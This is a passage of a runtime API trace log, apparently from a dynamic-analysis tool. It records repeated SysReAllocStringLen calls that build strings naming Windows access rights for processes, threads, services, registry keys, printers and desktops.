[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1e820*="STANDARD_RIGHTS_ALL") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1e810*="DELETE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1e800*="READ_CONTROL") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1e7f0*="WRITE_OWNER") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1e7e0*="WRITE_DAC") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2a1e7d0*="EVENT_MODIFY_STATE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2a1e7c0*="EVENT_ALL_ACCESS") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1e790*="STANDARD_RIGHTS_READ") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1e780*="STANDARD_RIGHTS_ALL") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1e770*="DELETE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1e760*="READ_CONTROL") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1e750*="WRITE_OWNER") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1e740*="WRITE_DAC") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2a1e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2a1e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1e700*="STANDARD_RIGHTS_WRITE") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1e6f0*="STANDARD_RIGHTS_READ") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1e6d0*="DELETE") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1e6c0*="READ_CONTROL") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1e6b0*="WRITE_OWNER") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1e6a0*="WRITE_DAC") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2a1e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2a1e680*="JOB_OBJECT_TERMINATE") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2a1e670*="JOB_OBJECT_QUERY") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2a1e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2a1e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2a1e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1e620*="STANDARD_RIGHTS_WRITE") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1e610*="STANDARD_RIGHTS_READ") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1e600*="STANDARD_RIGHTS_ALL") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1e5f0*="DELETE") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1e5e0*="READ_CONTROL") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1e5d0*="WRITE_OWNER") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1e5c0*="WRITE_DAC") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2a1e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2a1e5a0*="THREAD_IMPERSONATE") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2a1e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2a1e580*="THREAD_QUERY_INFORMATION") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2a1e570*="THREAD_SET_INFORMATION") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2a1e560*="THREAD_SET_CONTEXT") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2a1e550*="THREAD_GET_CONTEXT") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2a1e540*="THREAD_SUSPEND_RESUME") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2a1e530*="THREAD_TERMINATE") returned 1
[0201.261] SysReAllocStringLen (in: pbstr=0x2a1e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2a1e520*="THREAD_ALL_ACCESS") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1e500*="STANDARD_RIGHTS_WRITE") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1e4f0*="STANDARD_RIGHTS_READ") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1e4d0*="DELETE") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1e4c0*="READ_CONTROL") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1e4b0*="WRITE_OWNER") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1e4a0*="WRITE_DAC") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2a1e490*="PROCESS_QUERY_INFORMATION") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2a1e480*="PROCESS_SET_INFORMATION") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2a1e470*="PROCESS_SET_QUOTA") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2a1e460*="PROCESS_CREATE_PROCESS") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2a1e450*="PROCESS_DUP_HANDLE") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2a1e440*="PROCESS_VM_WRITE") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2a1e430*="PROCESS_VM_READ") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2a1e420*="PROCESS_VM_OPERATION") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2a1e410*="PROCESS_SET_SESSIONID") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2a1e400*="PROCESS_CREATE_THREAD") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2a1e3f0*="PROCESS_TERMINATE") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2a1e3e0*="PROCESS_ALL_ACCESS") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1e3b0*="STANDARD_RIGHTS_READ") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1e390*="DELETE") returned 1
[0201.262] SysReAllocStringLen (in: pbstr=0x2a1e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1e380*="READ_CONTROL") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1e370*="WRITE_OWNER") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1e360*="WRITE_DAC") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2a1e350*="PERM_FILE_CREATE") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2a1e340*="PERM_FILE_WRITE") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2a1e330*="PERM_FILE_READ") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1e310*="STANDARD_RIGHTS_WRITE") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1e300*="STANDARD_RIGHTS_READ") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1e2e0*="DELETE") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1e2d0*="READ_CONTROL") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1e2c0*="WRITE_OWNER") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1e2b0*="WRITE_DAC") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2a1e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2a1e290*="PRINTER_ACCESS_USE") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2a1e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2a1e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2a1e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a1e250*="PRINTER_ALL_ACCESS") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2a1e240*="PRINTER_EXECUTE") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2a1e230*="PRINTER_WRITE") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2a1e220*="PRINTER_READ") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a1e210*="PRINTER_ALL_ACCESS") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1e200*="DELETE") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1e1f0*="READ_CONTROL") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1e1e0*="WRITE_OWNER") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1e1d0*="WRITE_DAC") returned 1
[0201.263] SysReAllocStringLen (in: pbstr=0x2a1e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2a1e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2a1e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2a1e1a0*="SC_MANAGER_LOCK") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2a1e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2a1e180*="SC_MANAGER_CONNECT") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2a1e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2a1e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1e140*="STANDARD_RIGHTS_WRITE") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1e130*="STANDARD_RIGHTS_READ") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1e120*="STANDARD_RIGHTS_ALL") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1e110*="DELETE") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1e100*="READ_CONTROL") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1e0f0*="WRITE_OWNER") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1e0e0*="WRITE_DAC") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2a1e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2a1e0c0*="SERVICE_STOP") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2a1e0b0*="SERVICE_START") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2a1e0a0*="SERVICE_QUERY_STATUS") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2a1e090*="SERVICE_QUERY_CONFIG") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2a1e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0201.264] SysReAllocStringLen (in: pbstr=0x2a1e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2a1e070*="SERVICE_INTERROGATE") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2a1e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2a1e050*="SERVICE_CHANGE_CONFIG") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2a1e040*="SERVICE_ALL_ACCESS") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1e020*="STANDARD_RIGHTS_WRITE") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1e010*="STANDARD_RIGHTS_READ") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1e000*="STANDARD_RIGHTS_ALL") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1dff0*="DELETE") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1dfe0*="READ_CONTROL") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1dfd0*="WRITE_OWNER") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1dfc0*="WRITE_DAC") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2a1dfb0*="KEY_SET_VALUE") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2a1dfa0*="KEY_CREATE_LINK") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2a1df90*="KEY_CREATE_SUB_KEY") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2a1df80*="KEY_NOTIFY") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2a1df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2a1df60*="KEY_QUERY_VALUE") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1df40*="STANDARD_RIGHTS_WRITE") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2a1df30*="STANDARD_RIGHTS_READ 2") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2a1df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1df10*="DELETE") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1df00*="READ_CONTROL") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1def0*="WRITE_OWNER") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1dee0*="WRITE_DAC") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2a1ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2a1dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2a1deb0*="DESKTOP_JOURNALRECORD") returned 1
